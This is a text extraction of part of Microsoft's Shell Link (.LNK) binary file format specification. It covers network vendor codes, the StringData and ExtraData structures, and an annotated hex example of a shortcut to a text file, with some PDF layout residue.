WNNC_NET_FOXBAT  0x002B0000  
WNNC_NET_YAHOO  0x002C0000  
WNNC_NET_EXIFS  0x002D0000  
WNNC_NET_DAV  0x002E0000  
WNNC_NET_KNOWARE  0x002F0000  
WNNC_NET_OBJECT_DIRE  0x00300000  
WNNC_NET_MASFAX  0x00310000  
WNNC_NET_HOB_NFS  0x00320000  
WNNC_NET_SHIVA  0x00330000  
WNNC_NET_IBMAL  0x00340000  
WNNC_NET_LOCK  0x00350000  
WNNC_NET_TERMSRV  0x00360000  
WNNC_NET_SRT  0x00370000  
WNNC_NET_QUINCY  0x00380000  
WNNC_NET_OPENAFS  0x00390000  
WNNC_NET_AVID1  0X003A0000  
WNNC_NET_DFS  0x003B0000  
 
26 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Vendor name  Value  
WNNC_NET_KWNP  0x003C0000  
WNNC_NET_ZENWORKS  0x003D0000  
WNNC_NET_DRIVEONWEB  0x003E0000  
WNNC_NET_VMWARE  0x003F0000  
WNNC_NET_RSFX  0x00400000  
WNNC_NET_MFILES  0x00410000  
WNNC_NET_MS_NFS  0x00420000  
WNNC_NET_GOOGLE  0x00430000  
NetNameOffsetUnicode (4 bytes):  An optional, 32 -bit, unsigned integer that specifies the 
location of the NetNameUnicode  field. This value is an offset, in bytes, from the start of the 
CommonNetworkRelativeLink structure. This field MUST be present if the value of the 
NetNameOffset  field is greater than 0x00000014; otherwise, this field MUST NOT be 
present.  
DeviceNameOffsetUnicode (4 bytes):  An optional, 32 -bit, unsigned integer that specifies the 
location of the DeviceNameUnicode  field. This value is an offset, in bytes, from the start o f 
the CommonNetworkRelativeLink structure. This field MUST be present if the value of the 
NetNameOffset  field is greater than 0x00000014; otherwise, this field MUST NOT be 
present.  
NetName (variable):  A NULL –terminated string, as defined by the system def ault code page, 
which specifies a server share path; for example, " \\server \share".  
DeviceName (variable):  A NULL –terminated string, as defined by the system default code 
page, which specifies a device; for example, the drive letter "D:".  
NetNameUnicode ( variable):  An optional, NULL –terminated, Unicode string that is the 
Unicode version of the NetName  string. This field MUST be present if the value of the 
NetNameOffset  field is greater than 0x00000014; otherwise, this field MUST NOT be 
present.  
DeviceName Unicode (variable):  An optional, NULL –terminated, Unicode string that is the 
Unicode version of the DeviceName  string. This field MUST be present if the value of the 
NetNameOffset  field is greater than 0x00000014; otherwise, this field MUST NOT be 
present.  
2.4   StringData  
StringData refers to a set of structures that convey user interface and path identification 
information. The presence of these optional structures is controlled by LinkFlags (section 2.1.1) in 
the ShellLinkHeader (section 2.1). 
The StringData structures conform to the following ABNF rules [RFC5234] . 
 
STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]  
              [COMMAND _LINE_ARGUMENTS] [ICON_LOCATION]  
 
27 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   
NAME_STRING : An optional structure that specifies a description of the shortcut that is displayed 
to end users to identify the purpose of the shell link. This structure MUST be present if the 
HasName  flag is set.  
RELATIVE_ PATH : An optional structure that specifies the location of the link target relative to the 
file that contains the shell link. When specified, this string SHOULD be used when resolving the link. 
This structure MUST be present if the HasRelativePath  flag is set. 
WORKING_DIR : An optional structure that specifies the file system path of the working directory 
to be used when activating the link target. This structure MUST be present if the HasWorkingDir  
flag is set.  
COMMAND_LINE_ARGUMENTS : An optional structure that stores the command -line arguments 
that should be specified when activating the link target. This structure MUST be present if the 
HasArguments  flag is set.  
ICON_LOCATION : An optional structure that specifies the location of the icon to be used when 
displaying a shell link item in an icon view. This structure MUST be present if the HasIconLocation  
flag is set.  
All StringData structures have the following structure.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
CountCharacters  String (variable)  
... 
CountCharacters (2 bytes):  A 16-bit, unsigned integer that specifies either the number of 
characters, defined by the system default code page, or the number of Unicode characters 
found in the String  field. A value of zero specifies an empty string.  
String (variable):  An optional set of characters, defined by the system default code page, or a 
Unicode string with a length specified by the CountCharacters  field. This string MUST NOT be 
NULL-terminated . 
2.5   ExtraData  
ExtraData refers to a set of structures that convey additional information about a link target. These 
optional structures can be present in an extra data section that is appended to the basic Shell Link 
Binary File Format.  
The ExtraData structures conform to the following ABNF rules [RFC5234] : 
 
EXTRA_DATA       = *EXTRA_DATA_BLOCK TERMINAL_BLOCK  
 
EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /  
                   ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /  
                   KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /  
 
28 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010                     SHIM_PROPS / SPECIAL_FOLDER_PROPS /  
                   TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS  
 
EXTRA_DAT A: A structure consisting of zero or more property data blocks followed by a terminal 
block.  
EXTRA_DATA_BLOCK : A structure consisting of any one of the following property data blocks.  
CONSOLE_PROPS : A ConsoleDataBlock  structure (section 2.5.1). 
CONSOLE_FE_PROPS : A ConsoleFEDataBlock  structure (section 2.5.2). 
DARWIN_PROPS : A DarwinDataBlock  structure (section 2.5.3). 
ENVIRONMENT_PROPS : An EnvironmentVariable DataBlock  structure (section 2.5.4). 
ICON_ENVIRONMENT_PROPS : An IconEnvironmentDataBlock  structure (section 2.5.5). 
KNOWN_FOLDER_PROPS : A KnownFolderDataBlock  structure (section 2.5.6). 
PROPERTY_STORE_PROPS : A PropertyStoreDataBlock  structure (section 2.5.7 ). 
SHIM_PROPS : A ShimDataBlock  structure (section 2.5.8). 
SPECIAL_FOLDER_PROPS : A SpecialFolderDataBlock  structure (section 2.5.9 ). 
TRACKER_PROPS : A TrackerDataBlock  structure (section 2.5.10 ). 
VISTA_AND_ABOVE_IDLIST_PROPS : A VistaAndAboveIDListDataBlock  structure  (section 
2.5.11 ). 
TERMINAL_BLOCK  A structure that indicates the end of the extra data section.  
The general structure of an extra data section is shown in the following diagram.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
ExtraDataBlock (variable)  
... 
TerminalBlock  
ExtraDataBlock (variable):  An optional array of bytes that contains zero or more property 
data blocks listed in the EXTRA_DATA_BLOCK  syntax rule.  
TerminalBlock (4 bytes):  A 32-bit, unsigned integer that indicates the end of the extra data 
section. This value MUST be less than 0x00000004.  
 
 
29 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  2.5.1   ConsoleDataBlock  
The ConsoleDataBlock structure specifies the display settings to use when a link target specifies an 
application that is run in a console window. <2> 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
FillAttributes  PopupFillAttributes  
ScreenBufferSizeX  ScreenBufferSizeY  
WindowSizeX  WindowSizeY  
WindowOriginX  WindowOriginY  
Unused1  
Unused2  
FontSize  
FontFamily  
FontWeight  
Face Name  
... 
... 
... 
... 
... 
 
30 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  ... 
... 
(Face Name cont'd for 8 rows)  
CursorSize  
FullScreen  
InsertMode  
AutoPosition  
HistoryBufferSize  
NumberOfHistoryBuffers  
HistoryNoDup  
ColorTable  
... 
... 
... 
... 
... 
... 
... 
(ColorTable cont'd for 8 rows)  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the ConsoleDataBlock 
structure. This value MUST be 0x000000CC.  
 
31 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
ConsoleDataBlock extra data  section. This value MUST be 0xA0000002.  
FillAttributes (2 bytes):  A 16-bit, unsigned integer that specifies the fill attributes that control 
the foreground and background text colors in the console window. The following bit definitions 
can be combined to  specify 16 different values each for the foreground and background 
colors:  
Value  Meaning  
FOREGROUND_BLUE  
0x0001  The foreground text color contains blue.  
FOREGROUND_GREEN  
0x0002  The foreground text color contains green.  
FOREGROUND_RED  
0x0004  The foreground text color contains red.  
FOREGROUND_INTENSITY  
0x0008  The foreground text color is intensified.  
BACKGROUND_BLUE  
0x0010  The background text color contains blue.  
BACKGROUND_GREEN  
0x0020  The background text color contains green.  
BACKGROUND_RED  
0x0040  The background text color contains red.  
BACKGROUND_INTENSITY  
0x0080  The background text color is intensified.  
PopupFillAttributes (2 bytes):  A 16-bit, unsigned integer that specifies the fill attributes that 
control the foreground and background text color in the console window popup. The values are 
the same as for the FillAttributes  field. 
ScreenBufferSizeX (2 bytes):  A 16-bit, signed integer that specifies the horizontal size (X 
axis), in characters, of the console window buffer.  
ScreenBufferSizeY (2 bytes):  A 16-bit, signed integer that specifies the vertical size (Y axis), 
in characters, of the console window buffer.  
WindowSizeX (2 bytes):  A 16-bit, signed integer that specifies the horizontal size (X axis), in 
characters, of the console window.  
WindowSizeY (2 bytes):  A 16-bit, signed integer that specifies the vertical size (Y axis), in 
characters, of the console window.  
WindowOriginX (2 bytes):  A 16-bit, signed integer that specifies the horizontal coordinate (X 
axis), in p ixels, of the console window origin.  
WindowOriginY (2 bytes):  A 16-bit, signed integer that specifies the vertical coordinate (Y 
axis), in pixels, of the console window origin.  
Unused1 (4 bytes):  A value that is undefined and MUST be ignored.  
 
32 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Unused2 (4 bytes):  A value that is undefined and MUST be ignored.  
FontSize (4 bytes):  A 32-bit, unsigned integer that specifies the size, in pixels, of the font 
used in the console window.  
FontFamily (4 bytes):  A 32-bit, unsigned integer that specifies the family of the font used in 
the console window. This value MUST be one of the following:  
Value  Meaning  
FF_DONTCARE  
0x0000  The font family is unknown.  
FF_ROMAN  
0x0010  The font is variable -width with serifs; for example, "Times New Roman".  
FF_SWISS  
0x0020  The font is variable -width without serifs; for example, "Arial".  
FF_MODERN  
0x0030  The font is fixed -width, with or without serifs; for example, "Courier New".  
FF_SCRIPT  
0x0040  The font is designed to look like handwriting; for example, "Cursive".  
FF_DEC ORATIVE  
0x0050  The font is a novelty font; for example, "Old English".  
FontWeight (4 bytes):  A 16-bit, unsigned integer that specifies the stroke weight of the font 
used in the console window.  
Value  Meaning  
700 ≤ value   A bold font.  
value  < 700  A regular -weight font.  
Face Name (64 bytes):  A 32-character Unicode string that specifies the face name of the font 
used in the console window.  
CursorSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the cursor, in pixels, 
used in th e console window.  
Value  Meaning  
value  ≤ 25 A small cursor.  
26 — 50 A medium cursor.  
51 — 100 A large cursor.  
FullScreen (4 bytes):  A 32-bit, unsigned integer that specifies whether to open the console 
window in full -screen mode.  
 
33 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Meaning  
0x00000000  Full-screen mode is off.  
0x00000000 < value   Full-screen mode is on.  
InsertMode (4 bytes):  A 32-bit, unsigned integer that specifies insert mode in the console 
window.  
Value  Meaning  
0x00000000  Insert mode is disabled.  
0x00000000 < value   Insert mode is enabled.  
AutoPosition (4 bytes):  A 32-bit, unsigned integer that specifies auto -position mode of the 
console window.  
Value  Meaning  
0x00000000  The values of the WindowOriginX  and WindowOriginY  fields are used to 
position the console window . 
0x00000000 < 
value   The console window is positioned automatically.  
HistoryBufferSize (4 bytes):  A 32-bit, unsigned integer that specifies the size, in characters, 
of the buffer that is used to store a history of user input into the console window.  
NumberOfHistoryBuffers (4 bytes):  A 32-bit, unsigned integer that specifies the number of 
history buffers to use.  
HistoryNoDup (4 bytes):  A 32-bit, unsigned integer that specifies whether to remove 
duplicates in the history buffer.  
Value  Meaning  
0x00000 000 Duplicates are not allowed.  
0x00000000 < value   Duplicates are allowed.  
ColorTable (64 bytes):  A table of 16 32 -bit, unsigned integers specifying the RGB colors that 
are used for text in the console window. The values of the fill attribute fields FillAttributes  
and PopupFillAttributes  are used as indexes into this table to specify the final foreground 
and background color for a character.  
2.5.2   ConsoleFEDataBlock  
The ConsoleFEDataBlock structure specifies the code page to use for displaying text when a link 
target specifies an application that is run in a console window. <3> 
 
34 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
CodePage  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
ConsoleFEDataBlock structure. This value MUST be 0x0000000C.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
ConsoleFEDataBlock extra data section. This value MUST be 0xA0000004.  
CodePage (4 bytes):  A 32-bit, unsigned integer that specifies a code page language code 
identif ier. For details concerning the structure and meaning of language code identifiers, see 
[MS-LCID] . For additional background information, see [MSCHARSET]  and [MSDN -
CODEPAGE] . 
2.5.3   DarwinDataBlock  
The DarwinDataBlock structure specifies an application identifier that can be used instead of a link 
target IDList to install an application when a shell link is activated.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
DarwinDataAnsi  
... 
... 
... 
... 
... 
... 
 
35 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  ... 
(DarwinDataAnsi cont'd for 57 rows)  
DarwinDataUnicode (optional)  
... 
... 
... 
... 
... 
... 
... 
(DarwinDataUnicode (optional) cont'd for 122 rows)  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the DarwinDataBlock 
structure. This value MUST be 0x00000314.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifi es the signature of the 
DarwinDataBlock extra data section. This value MUST be 0xA0000006.  
DarwinDataAnsi (260 bytes):  A NULL –terminated string, defined by the system default code 
page, which specifies an application identifier. This field SHOULD be ignor ed. 
DarwinDataUnicode (520 bytes):  An optional, NULL –terminated, Unicode string that specifies 
an application identifier. <4> 
2.5.4   EnvironmentVariableDataBlock  
The EnvironmentVariableDataBlock structure specifies a path to environment variable information 
when the link target refers to a location that has a corresponding environment variable.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
 
36 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  TargetAnsi  
... 
... 
... 
... 
... 
... 
... 
(TargetAnsi cont'd for 57 rows)  
TargetUnicode  
... 
... 
... 
... 
... 
... 
... 
(TargetUnicode cont'd for 122 rows)  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
EnvironmentVariableDataBlock structure. This value MUST be 0x00000314.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies  the signature of the 
EnvironmentVariableDataBlock extra data section. This value MUST be 0xA0000001.  
 
37 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  TargetAnsi (260 bytes):  A NULL -terminated string, defined by the system default code page, 
which specifies a path to environment variable information.  
TargetUnicode (520 bytes):  An optional, NULL -terminated, Unicode string that specifies a 
path to environment variable information.  
2.5.5   IconEnvironmentDataBlock  
The IconEnvironmentDataBlock structure specifies the path to an icon. The path is encoded using 
environment variables, which makes it possible to find the icon across machines where the locations 
vary but are expressed using environment variables.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
TargetAnsi  
... 
... 
... 
... 
... 
... 
... 
(TargetAnsi cont'd for 57 rows)  
TargetUnicode  
... 
... 
... 
 
38 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  ... 
... 
... 
... 
(TargetUnicode cont'd for 122 rows)  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
IconEnvironmentDataBlock structure. This value MUST be 0x00000314.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the  signature of the 
IconEnvironmentDataBlock extra data section. This value MUST be 0xA0000007.  
TargetAnsi (260 bytes):  A NULL -terminated string, defined by the system default code page, 
which specifies a path that is constructed with environment variables.  
TargetUnicode (520 bytes):  An optional, NULL -terminated, Unicode string that specifies a 
path that is constructed with environment variables.  
2.5.6   KnownFolderDataBlock  
The KnownFolderDataBlock structure specifies the location of a known folder. This data can be used 
when a link target is a known folder to keep track of the folder so that the link target IDList can be 
translated when the link  is loaded.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
KnownFolderID  
... 
... 
... 
Offset  
 
39 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
KnownFolderDataBlock structure. This value MUST be 0x0000001C.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
KnownFolderDataBlock extra data section. This  value MUST be 0xA000000B.  
KnownFolderID (16 bytes):  A GUID  that specifies the folder GUID ID . 
Offset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the ItemID  of the first 
child segment of the IDList specified by KnownFolderID . This value is the offset, in bytes, 
into the link target IDList.  
2.5.7   PropertyStoreDataBlock  
A PropertyStoreDataBlock structure specifies a set of properties that can be used by applications to 
store extra data in the shell link.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
PropertyStore (variable)  
... 
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
PropertyStoreDataBlock structure. This value MUST be greater than or equal to 0x0000000C.  
 
 
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
PropertyStoreDataBlock extra data section. This value MUST be 0xA0000009.  
PropertyStore (variable):  A serialized property storage structure ( [MS-PROPSTORE]  section 
2.2). 
2.5.8   ShimDataBlock  
The ShimDataBlock structure specifies the name of a shim  that can be applied when activating a 
link target.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
 
40 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  BlockSignature  
LayerName (variable)  
... 
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the ShimDataBlock 
structure. This value MUST be greater than or equal to 0x00000088.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
ShimDataBlock extra data section. This value MUST be 0xA0000008.  
LayerName (variable):  A Unicode string that specifies the name of a shim layer to apply to a 
link target when it is being activ ated. 
2.5.9   SpecialFolderDataBlock  
The SpecialFolderDataBlock structure specifies the location of a special folder. This data can be used 
when a link target is a special folder to keep track of the folder, so that the link target IDList  can be 
translated when the link is loaded.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
SpecialFolderID  
Offset  
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
SpecialFolderDataBlock structure. This value MUST be 0x00000010.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
SpecialFolderDataBlock extra data section. This value MUST be 0xA0000005.  
SpecialFolderID (4 bytes):  A 32-bit, unsigned integer that specifies the folder integer ID . 
Offset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the ItemID  of the first 
child segment of the IDList specified by SpecialFolderID . This value is the offset, in bytes, 
into the link target IDList.  
2.5.10   TrackerDataBlock  
The TrackerDataBlock structure specifies data that can be used to resolve a link target if it is not 
found in its original location when the link is resolved. This data is passed to the Link Tracking 
service [MS-DLTW]  to find the link target.  
 
41 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
Length  
Version  
MachineID (variable)  
... 
Droid  
... 
... 
... 
... 
... 
... 
... 
DroidBirth  
... 
... 
... 
... 
 
42 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  ... 
... 
... 
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the TrackerDataBlock 
structure. This value MUST be 0x00000060.  
BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
TrackerDataBlock extra data section. This value MUST be 0xA0000003.  
Length (4 bytes):  A 32-bit, unsigned integer. This value MUST be greater than or equal to 
0x0000058.  
Version (4 bytes):  A 32-bit, unsigned integer. This value MUST be 0x00000000.  
MachineID (variable):  A character string, as defined by the system default code page, which 
specifies the NetBIOS name  of the machine where the link target was last known to reside.  
Droid (32 bytes):  Two GUID values that are used to find the link target with the Link Tracking 
service, as specified in [MS -DLTW].  
DroidBirth (32 bytes):  Two GUID values that are used to find the link target with the Link 
Tracking service, as specified in [MS -DLTW].  
2.5.11   VistaAndAboveIDListDataBlock  
The VistaAndAboveIDListDataBlock structure specifies an alternate IDList that can be used instead 
of the LinkTargetIDList  structure (section 2.2) on platforms that support it. <5> 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
BlockSize  
BlockSignature  
IDList (variable)  
... 
BlockSize (4 bytes):  A 32-bit, unsigned integer that specifies the size of the 
VistaAndAboveIDListDataBlock structure. This value MUST be greater than or equal to 
0x0000000A.  
 
 
43 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  BlockSignature (4 bytes):  A 32-bit, unsigned integer that specifies the signature of the 
VistaAndAboveIDListDataBlock extra data section. This value MUST be 0xA000000C.  
IDList (variable):  An IDList  structure (section 2.2.1 ). 
 
44 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  3   Structure Examples  
3.1   Shortcut to a File  
This section presents a sample of the Shell Link Binary File Format, consisting of a shortcut to a file 
with the path "C: \test\a.txt".  
The following is the hexadecimal representation of the contents of the shell link.  
 x0 x1 x2 x3 x4 x5 x6 x7 x8 x9 xA xB xC xD xE xF 
0000  4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 
0010  00 00 00 46 9B 00 08 00 20 00 00 00 D0 E9 EE F2 
0020  15 15 C9 01 D0 E9 EE F2 15 15 C9 01 D0 E9 EE F2 
0030  15 15 C9 01 00 00 00 00 00 00 00 00 01 00 00 00 
0040  00 00 00 00 00 00 00 00 00 00 00 00 BD 00 14 00 
0050  1F 50 E0 4F D0 20 EA 3A 69 10 A2 D8 08 00 2B 30 
0060  30 9D 19 00 2F 43 3A 5C 00 00 00 00 00 00 00 00 
0070  00 00 00 00 00 00 00 00 00 00 00 46 00 31 00 00 
0080  00 00 00 2C 39 69 A3 10 00 74 65 73 74 00 00 32 
0090  00 07 00 04 00 EF BE 2C 39 65 A3 2C 39 69 A3 26 
00A0  00 00 00 03 1E 00 00 00 00 F5 1E 00 00 00 00 00 
00B0  00 00 00 00 00 74 00 65 00 73 00 74 00 00 00 14 
00C0  00 48 00 32 00 00 00 00 00 2C 39 69 A3 20 00 61 
00D0  2E 74 78 74 00 34 00 07 00 04 00 EF BE 2C 39 69 
00E0  A3 2C 39 69 A3 26 00 00 00 2D 6E 00 00 00 00 96 
00F0  01 00 00 00 00 00 00 00 00 00 00 61 00 2E 00 74 
0100  00 78 00 74 00 00 00 14 00 00 00 3C 00 00 00 1C 
0110  00 00 00 01 00 00 00 1C 00 00 00 2D 00 00 00 00 
0120  00 00 00 3B 00 00 00 11 00 00 00 03 00 00 00 81 
0130  8A 7A 30 10 00 00 00 00 43 3A 5C 74 65 73 74 5C 
0140  61 2E 74 78 74 00 00 07 00 2E 00 5C 00 61 00 2E 
0150  00 74 00 78 00 74 00 07 00 43 00 3A 00 5C 00 74 
0160  00 65 00 73 00 74 00 60 00 00 00 03 00 00 A0 58 
0170  00 00 00 00 00 00 00 63 68 72 69 73 2D 78 70 73 
 
45 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   x0 x1 x2 x3 x4 x5 x6 x7 x8 x9 xA xB xC xD xE xF 
0180  00 00 00 00 00 00 00 40 78 C7 94 47 FA C7 46 B3 
0190  56 5C 2D C6 B6 D1 15 EC 46 CD 7B 22 7F DD 11 94 
01A0  99 00 13 72 16 87 4A 40 78 C7 94 47 FA C7 46 B3 
01B0  56 5C 2D C6 B6 D1 15 EC 46 CD 7B 22 7F DD 11 94 
01C0  99 00 13 72 16 87 4A 00 00 00 00      
HeaderSize : (4 bytes, offset 0x0000), 0x0000004C as required.  
LinkCLSID : (16 bytes, offset 0x0004), 00021401 -0000-0000-C000-000000000046.  
LinkFlags : (4 bytes, offset 0x0014), 0x0008009B means the following LinkFlags (section 2.1.1) are 
set: 
HasLinkTa rgetIDList  
HasLinkInfo  
HasRelativePath  
HasWorkingDir  
IsUnicode  
EnableTargetMetadata  
FileAttributes : (4 bytes, offset 0x0018), 0x00000020, means the following FileAttributesFlags 
(section 2.1.2) are set:  
FILE_ATTRIBUTE_ARCHIVE  
CreationTime : (8 bytes, offset 0x001C) FILETIME 9/12/08, 8:27:17PM.  
AccessTime : (8 bytes, offset 0x0024) FILETIME 9/1 2/08, 8:27:17PM.  
WriteTime : (8 bytes, offset 0x002C) FILETIME 9/12/08, 8:27:17PM.  
FileSize : (4 bytes, offset 0x0034), 0x00000000.  
IconIndex : (4 bytes, offset 0x0038), 0x00000000.  
ShowCommand : (4 bytes, offset 0x003C), SW_SHOWNORMAL(1).  
Hotkey : (2 bytes, offset 0x0040), 0x0000.  
Reserved : (2 bytes, offset 0x0042), 0x0000.  
Reserved2 : (4 bytes, offset 0x0044), 0 x00000000.  
Reserved3 : (4 bytes, offset 0x0048), 0 x00000000.  
Because HasLinkTargetIDList  is set, a LinkTargetIDList  structure (section 2.2) follows:  
IDListSize : (2 bytes, offset 0x004C), 0x00BD, the size of IDList . 
 
46 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  IDList : (189 bytes, offset 0x004E) an IDList  structure (section 2.2.1) follows:  
ItemIDList : (187 bytes, offset 0x004E), ItemID  structures (section 2.2.2) follow:  
ItemIDSize : (2 bytes, offset 0x004E), 0x0014  
Data: (12 bytes, offset 0x0050), <18 bytes of data> [computer]  
ItemIDSize : (2 bytes, offset 0x0062), 0x0019  
Data: (23 bytes, offset 0x0064), <23 bytes of data> [c:]  
ItemIDSize : (2 bytes, offset 0x007B), 0x0046  
